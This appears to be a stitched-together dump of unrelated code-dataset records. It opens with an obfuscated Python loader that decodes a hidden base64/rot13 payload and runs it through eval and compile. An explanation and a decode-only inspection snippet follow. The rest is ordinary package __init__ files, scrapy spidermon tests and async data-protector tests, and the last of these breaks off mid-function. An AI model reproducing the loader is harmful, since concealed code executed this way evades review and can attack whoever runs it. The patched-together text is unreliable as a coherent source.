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'
pizza = '\x72\x6f\x74\x5f\x31\x33'
mobile = codecs.decode(eval('\x74\x61\x68\x6d\x69\x64'), eval('\x70\x69\x7a\x7a\x61'))
burger = base64.b64decode(''.join([chr(tech) for tech in htr])+eval('\x6d\x6f\x62\x69\x6c\x65'))
eval(compile(eval("\x62\x75\x72\x67\x65\x72"),"<tahm1d>","exec"))
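The loader above is a three-layer unpacker: htr is a list of code points forming the head of a base64 blob, tahmid is the rot13-encoded tail (pizza resolves to 'rot_13'), and the concatenated, base64-decoded result is handed to eval/compile for execution. A minimal inspection sketch follows; it is not part of the original file and assumes the htr and tahmid values defined above. It peels the same layers without executing anything:
import base64
import codecs

def unpack(htr, tahmid):
    # Hypothetical helper: decode only, never eval/exec the payload.
    head = ''.join(chr(n) for n in htr)      # code-point list -> ASCII text
    tail = codecs.decode(tahmid, 'rot_13')   # undo the rot13 layer
    return base64.b64decode(head + tail)     # strip the outer base64 layer

# unpack(htr, tahmid).decode('utf-8', errors='replace') yields the hidden source.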
| 3,332.5
| 21,444
| 0.628657
| 4,947
| 26,660
| 3.387912
| 0.020214
| 0.070167
| 0.045107
| 0.057995
| 0.578819
| 0.56784
| 0.559606
| 0.546897
| 0.536635
| 0.524463
| 0
| 0.567098
| 0.184659
| 26,660
| 7
| 21,445
| 3,808.571429
| 0.203938
| 0
| 0
| 0
| 0
| 0
| 0.18811
| 0.186909
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| c4b0ef90b3c40721cded45a90d9187f86727e17b
| 111
| py
| Python
| transformio/__init__.py
| karimbahgat/transformio
| 0455aa78ef203b12a2684be0edc69848dd6526e1
| ["MIT"] | null | null | null |
transformio/__init__.py
| karimbahgat/transformio
| 0455aa78ef203b12a2684be0edc69848dd6526e1
| ["MIT"] | null | null | null |
transformio/__init__.py
| karimbahgat/transformio
| 0455aa78ef203b12a2684be0edc69848dd6526e1
| ["MIT"] | null | null | null |
from . import transforms
from . import imwarp
from . import vector
from . import accuracy
from . import utils
| 15.857143
| 24
| 0.765766
| 15
| 111
| 5.666667
| 0.466667
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 111
| 6
| 25
| 18.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| f21a78b0fe5ba07bf89f3c3f00cd012ec6d2a332
| 9,506
| py
| Python
| tests/test_item_scraped_signal.py
| zanachka/spidermon
| d2840b6bbb6ba6d8a0ef633deac66588d243e615
| ["BSD-3-Clause"] | 405
| 2019-01-10T13:06:09.000Z
| 2022-03-30T20:14:58.000Z
| tests/test_item_scraped_signal.py
| zanachka/spidermon
| d2840b6bbb6ba6d8a0ef633deac66588d243e615
| ["BSD-3-Clause"] | 226
| 2019-01-04T13:31:17.000Z
| 2022-03-28T21:06:10.000Z
| tests/test_item_scraped_signal.py
| zanachka/spidermon
| d2840b6bbb6ba6d8a0ef633deac66588d243e615
| ["BSD-3-Clause"] | 87
| 2019-01-07T10:23:26.000Z
| 2022-02-22T04:38:04.000Z
|
import pytest
from scrapy import Item, signals
from scrapy.spiders import Spider
from scrapy.utils.test import get_crawler
class TestItem(Item):
__test__ = False
@pytest.fixture
def spider():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
return spider
def test_add_stats_item_scraped_count_by_item_type(spider):
for _ in range(15):
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item={"_type": "regular_dict"},
response="",
spider=spider,
)
for _ in range(20):
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=Item(),
response="",
spider=spider,
)
for _ in range(25):
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=TestItem(),
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count") == 60
assert stats.get("spidermon_item_scraped_count/dict") == 15
assert stats.get("spidermon_item_scraped_count/Item") == 20
assert stats.get("spidermon_item_scraped_count/TestItem") == 25
def test_item_scraped_count_single_field(spider):
returned_items = [{"field1": "value1"}]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 1
def test_item_scraped_count_multiple_field(spider):
returned_items = [{"field1": "value1", "field2": "value2"}]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 1
assert stats.get("spidermon_item_scraped_count/dict/field2") == 1
def test_item_scraped_count_multiple_items(spider):
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": "value2"},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
def test_item_scraped_count_multiple_items_field_missing(spider):
returned_items = [
{"field1": "value1", "field2": "value2"},
{
"field1": "value1",
},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 1
def test_item_scraped_count_single_nested_field(spider):
returned_items = [{"field1": {"field1.1": "value1.1"}}]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict") == 1
assert stats.get("spidermon_item_scraped_count/dict/field1") == 1
assert stats.get("spidermon_item_scraped_count/dict/field1/field1.1") == 1
def test_item_scraped_count_multiple_nested_field(spider):
returned_items = [
{
"field1": {"field1.1": "value1.1"},
"field2": "value2",
"field3": {"field3.1": "value3.1"},
},
{
"field1": {
"field1.1": "value1.1",
"field1.2": "value1.2",
},
"field2": "value2",
},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict") == 2
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field1/field1.1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field1/field1.2") == 1
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
assert stats.get("spidermon_item_scraped_count/dict/field3") == 1
def test_do_not_add_field_coverage_when_spider_closes_if_do_not_have_field_coverage_settings():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": False,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
item = {"field1": "value1"}
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
) # Return item to have some stats to calculate coverage
crawler.signals.send_catch_log(
signal=signals.spider_closed, spider=spider, reason=None
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_field_coverage/dict/field1") is None
def test_add_field_coverage_when_spider_closes_if_have_field_coverage_settings():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
item = {"field1": "value1"}
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
) # Return item to have some stats to calculate coverage
crawler.signals.send_catch_log(
signal=signals.spider_closed, spider=spider, reason=None
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_field_coverage/dict/field1") == 1.0
def test_item_scraped_count_ignore_none_values():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
"SPIDERMON_FIELD_COVERAGE_SKIP_NONE": True,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": None},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 1
def test_item_scraped_count_do_not_ignore_none_values():
settings = {
"SPIDERMON_ENABLED": True,
"EXTENSIONS": {"spidermon.contrib.scrapy.extensions.Spidermon": 100},
"SPIDERMON_ADD_FIELD_COVERAGE": True,
"SPIDERMON_FIELD_COVERAGE_SKIP_NONE": False,
}
crawler = get_crawler(settings_dict=settings)
spider = Spider.from_crawler(crawler, "example.com")
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": None},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
def test_item_scraped_count_do_not_ignore_none_values_by_default(spider):
returned_items = [
{"field1": "value1", "field2": "value2"},
{"field1": "value1", "field2": None},
]
for item in returned_items:
spider.crawler.signals.send_catch_log_deferred(
signal=signals.item_scraped,
item=item,
response="",
spider=spider,
)
stats = spider.crawler.stats.get_stats()
assert stats.get("spidermon_item_scraped_count/dict/field1") == 2
assert stats.get("spidermon_item_scraped_count/dict/field2") == 2
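The assertions above pin down Spidermon's stats-key convention: spidermon_item_scraped_count/<type>[/<field-path>] counters per item type and field, and spidermon_field_coverage/<type>/<field-path> ratios once the spider closes. A rough sketch of that derivation, hypothetical rather than Spidermon's actual implementation:
def field_coverage(stats):
    # Derive coverage ratios from the scraped-count counters asserted above.
    prefix = "spidermon_item_scraped_count/"
    coverage = {}
    for key, count in stats.items():
        if not key.startswith(prefix) or "/" not in key[len(prefix):]:
            continue  # skip per-type totals such as .../dict
        item_type, field_path = key[len(prefix):].split("/", 1)
        total = stats[prefix + item_type]
        coverage["spidermon_field_coverage/%s/%s" % (item_type, field_path)] = count / total
    return coverage

# Example matching test_item_scraped_count_multiple_items_field_missing:
# counts {dict: 2, dict/field1: 2, dict/field2: 1} yield coverage 1.0 and 0.5.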
| 30.664516
| 95
| 0.64717
| 1,085
| 9,506
| 5.376037
| 0.076498
| 0.094291
| 0.098749
| 0.110406
| 0.935539
| 0.928167
| 0.910338
| 0.866792
| 0.859421
| 0.844677
| 0
| 0.021218
| 0.236482
| 9,506
| 309
| 96
| 30.763754
| 0.782447
| 0.011046
| 0
| 0.647303
| 0
| 0
| 0.22707
| 0.162694
| 0
| 0
| 0
| 0
| 0.116183
| 1
| 0.053942
| false
| 0
| 0.016598
| 0
| 0.082988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| f22325e6f64bd7ad8c30fa92430526321ebe1978
| 36
| py
| Python
| petk/__init__.py
| open-data-toronto/petk
| b7687ca21771f9bb0cf9191c6bc4642b7c2311c3
| ["MIT"] | null | null | null |
petk/__init__.py
| open-data-toronto/petk
| b7687ca21771f9bb0cf9191c6bc4642b7c2311c3
| ["MIT"] | null | null | null |
petk/__init__.py
| open-data-toronto/petk
| b7687ca21771f9bb0cf9191c6bc4642b7c2311c3
| ["MIT"] | null | null | null |
from .exploration import DataReport
| 18
| 35
| 0.861111
| 4
| 36
| 7.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.96875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| 1ef9dcd1fd42439392f5895754268c6d56005f6d
| 663
| py
| Python
| runway/commands/__init__.py
| paul-duffy/runway
| a0c22eb7ca7b55df5317bdda92c08c4bb39569d2
| ["Apache-2.0"] | 1
| 2020-02-25T21:08:00.000Z
| 2020-02-25T21:08:00.000Z
| runway/commands/__init__.py
| paul-duffy/runway
| a0c22eb7ca7b55df5317bdda92c08c4bb39569d2
| ["Apache-2.0"] | 2
| 2020-01-07T15:00:55.000Z
| 2020-01-07T15:03:25.000Z
| runway/commands/__init__.py
| voodooGQ/runway
| 8a744f33b39f1342022f1b57db996bb843e4556c
| ["Apache-2.0"] | null | null | null |
"""Collect all the command classes together."""
from .runway import envvars # noqa
from .runway import gen_sample # noqa
from .runway import init # noqa
from .runway import preflight # noqa
from .runway import run_aws # noqa
from .runway import run_python # noqa
from .runway import run_stacker # noqa
from .runway import test # noqa
from .runway import tfenv # noqa
from .runway import kbenv # noqa
from .runway import whichenv # noqa
from .modules import deploy # noqa
from .modules import destroy # noqa
from .modules import dismantle # noqa
from .modules import plan # noqa
from .modules import takeoff # noqa
from .modules import taxi # noqa
| 31.571429
| 47
| 0.751131
| 95
| 663
| 5.2
| 0.315789
| 0.259109
| 0.356275
| 0.404858
| 0.139676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187029
| 663
| 20
| 48
| 33.15
| 0.916512
| 0.191554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| 482ec6cab84fcf7db4a1a758b05d7b025ee9ee4f
| 151
| py
| Python
| env/lib/python3.6/site-packages/tests/conftest.py
| anthowen/duplify
| 846d01c1b21230937fdf0281b0cf8c0b08a8c24e
| ["MIT"] | 1
| 2019-04-21T18:57:57.000Z
| 2019-04-21T18:57:57.000Z
| env/lib/python3.6/site-packages/tests/conftest.py
| anthowen/duplify
| 846d01c1b21230937fdf0281b0cf8c0b08a8c24e
| ["MIT"] | 1
| 2018-12-11T15:12:56.000Z
| 2018-12-11T15:12:56.000Z
| env/lib/python3.6/site-packages/tests/conftest.py
| anthowen/duplify
| 846d01c1b21230937fdf0281b0cf8c0b08a8c24e
| ["MIT"] | null | null | null |
import pytest
@pytest.fixture(scope='function', autouse=True)
def database_access(db):
"""Automatically enable database access for all tests."""
| 21.571429
| 61
| 0.748344
| 19
| 151
| 5.894737
| 0.842105
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125828
| 151
| 6
| 62
| 25.166667
| 0.848485
| 0.337748
| 0
| 0
| 0
| 0
| 0.085106
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| 6f9b0e95c573e99f0695e827eb6e0f888738a703
| 12,892
| py
| Python
| src/tt_data_protector/tt_data_protector/tests/test_logic.py
| Alacrate/the-tale
| 43b211f3a99e93964e95abc20a8ed649a205ffcf
| ["BSD-3-Clause"] | 85
| 2017-11-21T12:22:02.000Z
| 2022-03-27T23:07:17.000Z
| src/tt_data_protector/tt_data_protector/tests/test_logic.py
| Alacrate/the-tale
| 43b211f3a99e93964e95abc20a8ed649a205ffcf
| ["BSD-3-Clause"] | 545
| 2017-11-04T14:15:04.000Z
| 2022-03-27T14:19:27.000Z
| src/tt_data_protector/tt_data_protector/tests/test_logic.py
| Alacrate/the-tale
| 43b211f3a99e93964e95abc20a8ed649a205ffcf
| ["BSD-3-Clause"] | 45
| 2017-11-11T12:36:30.000Z
| 2022-02-25T06:10:44.000Z
|
import uuid
from aiohttp import test_utils
from tt_web import postgresql as db
from .. import logic
from .. import relations
from .. import operations
from .. import exceptions
from . import helpers
class GetPluginForSourceTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
plugin_1 = await logic.get_pluging_for_source(helpers.get_config()['custom'],
'test_source_1')
plugin_2 = await logic.get_pluging_for_source(helpers.get_config()['custom'],
'test_source_3')
new_plugin_1 = await logic.get_pluging_for_source(helpers.get_config()['custom'],
'test_source_1')
self.assertIs(plugin_1, new_plugin_1)
self.assertIsNot(plugin_1, plugin_2)
@test_utils.unittest_run_loop
async def test_error(self):
with self.assertRaises(exceptions.CanNotConstructPlugin):
await logic.get_pluging_for_source(helpers.get_config()['custom'],
'unknowm_source')
class ProcessSubreportTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test_already_processed(self):
await operations.create_report_base([("test_source_1", 2)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
subreport = subreport.replace(state=relations.SUBREPORT_STATE.READY)
await operations.update_subreport(subreport)
async with self.check_db_record_not_changed('subreports', subreport.id):
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
@test_utils.unittest_run_loop
async def test_processing_failed__no_plugin(self):
await operations.create_report_base([("unknowm_source", 2)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
with self.assertRaises(exceptions.CanNotConstructPlugin):
async with self.check_db_record_not_changed('subreports', subreport.id):
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
@test_utils.unittest_run_loop
async def test_processing_failed__plugin_work_failed(self):
await operations.create_report_base([("test_source_2", 20)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
async with self.check_db_record_not_changed('subreports', subreport.id):
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
new_subreport = await operations.get_subreport(subreport.id)
self.assertEqual(new_subreport.state, relations.SUBREPORT_STATE.READY)
self.assertEqual(new_subreport.data,
{'id': 20,
'report': [['test_source_2', 'type_3', 'data_5'],
['test_source_2', 'type_3', 'data_6']]})
@test_utils.unittest_run_loop
async def test_has_changes(self):
await operations.create_report_base([("test_source_1", 2)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
new_subreport = await operations.get_subreport(subreport.id)
self.assertEqual(new_subreport.state, relations.SUBREPORT_STATE.READY)
self.assertEqual(new_subreport.data,
{'id': 2,
'report': [['test_source_1', 'type_3', 'data_3']]})
class ProcessSubreportsTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
report_1_id = await operations.create_report_base([("test_source_1", 2),
("test_source_2", 20),
("test_source_2", 40)])
report_2_id = await operations.create_report_base([("test_source_1", 3),
("test_source_2", 20)])
await logic.process_subreports(helpers.get_config()['custom'])
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 1)
self.assertEqual(result[0]['report'], report_1_id)
await logic.process_subreports(helpers.get_config()['custom'])
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s ORDER BY id',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 4)
self.assertTrue(all(row['report'] == report_1_id for row in result[:2]))
self.assertTrue(all(row['report'] == report_2_id for row in result[2:]))
await logic.process_subreports(helpers.get_config()['custom'])
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s ORDER BY ID',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 5)
class FormReportTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
report_1_id = await operations.create_report_base([("test_source_1", 1)])
report_2_id = await operations.create_report_base([("test_source_1", 333)])
await logic.process_subreports(helpers.get_config()['custom'])
await logic.form_report(helpers.get_config()['custom'], report_2_id)
report_1 = await operations.get_report(report_1_id)
self.assertEqual(report_1.state, relations.REPORT_STATE.PROCESSING)
self.assertEqual(report_1.data, {'report': []})
report_2 = await operations.get_report(report_2_id)
